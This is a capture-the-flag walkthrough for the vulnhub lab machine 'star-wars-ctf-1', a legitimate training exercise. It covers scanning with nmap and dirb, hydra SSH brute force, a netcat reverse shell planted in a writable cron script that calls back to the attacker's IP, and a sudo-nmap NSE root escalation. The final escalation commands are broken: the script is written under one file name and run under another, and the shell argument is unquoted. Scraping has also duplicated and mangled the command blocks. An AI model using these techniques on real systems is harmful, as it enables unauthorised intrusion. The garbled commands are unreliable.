Hi friends, Today I am going to share a writeup for gaining root access for the vulnhub machine “star-wars-ctf-1”. It contains one flag that is accessible after gaining root level privilege on the machine. It is developed by Sir Logic team difficulty level of this machine is for beginners. Our goal is to gain root shell access.

Download it from here: https://www.vulnhub.com/entry/star-wars-ctf-1,528/

Table of Content:

Reconnaissance

netdiscover

Nmap

Dirb

Steganography Online decrypt tool

Exploitation

hydra

SSH Login

Privilege Escalation

Post Enumeration

Abusing writeable script

Root access

WalkThrough

Reconnaissance

let’s start Reconnaissance for the vulnerable machine by using netDiscover. It is used for identifying the IP address of the various devices in our network.

netdiscover 1 netdiscover

As we got our target IP address for the machine (192.168.0.188), And now we are performing the nmap for the port scanning and further information gathering on the target host. Here “-A” means Aggressive scanning.

nmap -A 192.168.0.188 1 nmap - A 192.168.0.188

so, we come to know that only two ports are open here.

Since port 80 is open, Let’s explore the domain or webpage on this target IP address using any browser.

Now we have to find the password. To find the password we are checking the source code of the webpage.

The author has given a hint “password is here”. The text format is in the base64 encode and we tried to decode the text but we unable to decode the text, I think Author want to bluff us in decode the text, further from the main page we downloaded source image to find hidden text that is known as “Steganography”.

To use steganography Click the url https://stylesuxx.github.io/steganography/ and upload the image then click the decoded image for extracting password.

After clicking on decode image, we got the password “babyYoda123”, but we don’t know the username, therefore we made directory brute attack using dirb tool for enumerating web directories.

dirb http://192.168.0.188 1 dirb http : //192.168.0.188

here, it shows some directory, but I was interested in robots.txt file.

I navigate to the url http://192.168.0.188/robots.txt and found a webpage named as “/r2d2” but still, we have to enumerate username.

As we can see didn’t find any username, further, we made use of dirb tool and this time we were looking for php, .js and .txt extension file types.

dirb http://192.168.0.188/ -X .php,.js,.txt 1 dirb http : //192.168.0.188/ -X .php,.js,.txt

From its result user.js looks interesting to me, let’s explore this.

we open the user.js in the browser and found two entries which could the usernames: skywalker and another one is han.

As we have both usernames and password now, we can perform the Brute-force attacks on ssh with help of the hydra tool. We created a users.txt file and we have a password (babyYoda123), now we have to crack the valid username with password.

hydra -L users.txt -p babyYoda123 192.168.0.188 ssh 1 hydra - L users . txt - p babyYoda123 192.168.0.188 ssh

As you can observe it has found the 1 valid username: han for the password: babyYoda123 SSH login.

After login into ssh, we move for post enumeration and found a hidden file named as .secrets that contain a text file “note.txt”. This file looks like a hint for us, where the author wants us to use Cewl for making a wordlist.

ssh han@192.168.0.188 ls -la cd .secrets ls -la cat note.txt 1 2 3 4 5 ssh han @ 192.168.0.188 ls - la cd . secrets ls - la cat note . txt

further, we check passwd file for enumerating user account and we saw han, starwalker & Darth as usernames.

tail /etc/passwd 1 tail / etc / passwd

Above we have found the robots.txt which has given a hint for /r2d2. So, we explored it in the web browser and obtain web page as shown in the image.

As you remember the author has given hint i.e. cewl. By using cewl command, we created a dict.txt file and used the dict.txt file as password list for making brute attack over ssh for user:skywalker.

cewl http://192.168.0.188/r2d2 > dict.txt hydra -l skywalker -P dict.txt 192.168.0.188 ssh 1 2 cewl http : //192.168.0.188/r2d2 > dict.txt hydra - l skywalker - P dict . txt 192.168.0.188 ssh

As we can see hydra given a valid password for the skywalker.

Now have to switch the user han to skywalker and enumerate further.

su skywalker ls -la cd .secrets ls -la 1 2 3 4 su skywalker ls - la cd . secrets ls - la

After switching into user, we move for post enumeration and found a hidden file named as .secrets that contain a text file “note.txt”. This file looks like a hint for us, where the author mentioned: “Darth must take up the job of being a good father”. From this we got a clue, that may be Darth is the user.

After switching into the home directory, we move for post enumeration and found a Darth folder in that contains a hidden file named as .secrets that contain a python file “evil.py”. As you can see in the above image, there is a read and write executable python file, also this file is executing after one minute.

Privilege Escalation

Since, the evil.py script was writable, therefore, we edit the evil.py to the get reverse shell as Darther over netcat.

nano evil.py import os os.system("nc -e /bin/bash 192.168.0.147 1234") 1 2 3 nano evil . py import os os . system ( "nc -e /bin/bash 192.168.0.147 1234" )

In a new terminal, we run netcat listener to obtain the reverse connection after one minute.

nc -lvp 1234 1 nc - lvp 1234

And after one minute we obtained session as Darth user, further we used python one-liner to obtain the proper TTY shell and then check the sudo privilege for user Darth.

python -c 'import pty; pty.spawn("/bin/bash")' sudo -l 1 2 python - c 'import pty; pty.spawn("/bin/bash")' sudo - l

We found, the user Darth own sudo right for NMAP, thus without wasting much time, we write root.nse script inside /tmp to run /bin/bash for root privilege Escalation when executing through nmap.

echo echo "os.execute(/bin/sh)" > /tmp/nmap.nse sudo nmap --script=/tmp/root.nse id cd /root cat flag.txt 1 2 3 4 5 echo echo "os.execute(/bin/sh)" > / tmp / nmap . nse sudo nmap -- script = / tmp / root . nse id cd / root cat flag . txt

Booom!!! We have completed the task and obtain the final flag of the machine

Author: Madhava Rao Yejarla is an Ethical Hacker, Security Analyst, Penetration Tester from India. Contact on LinkedIn or Twitter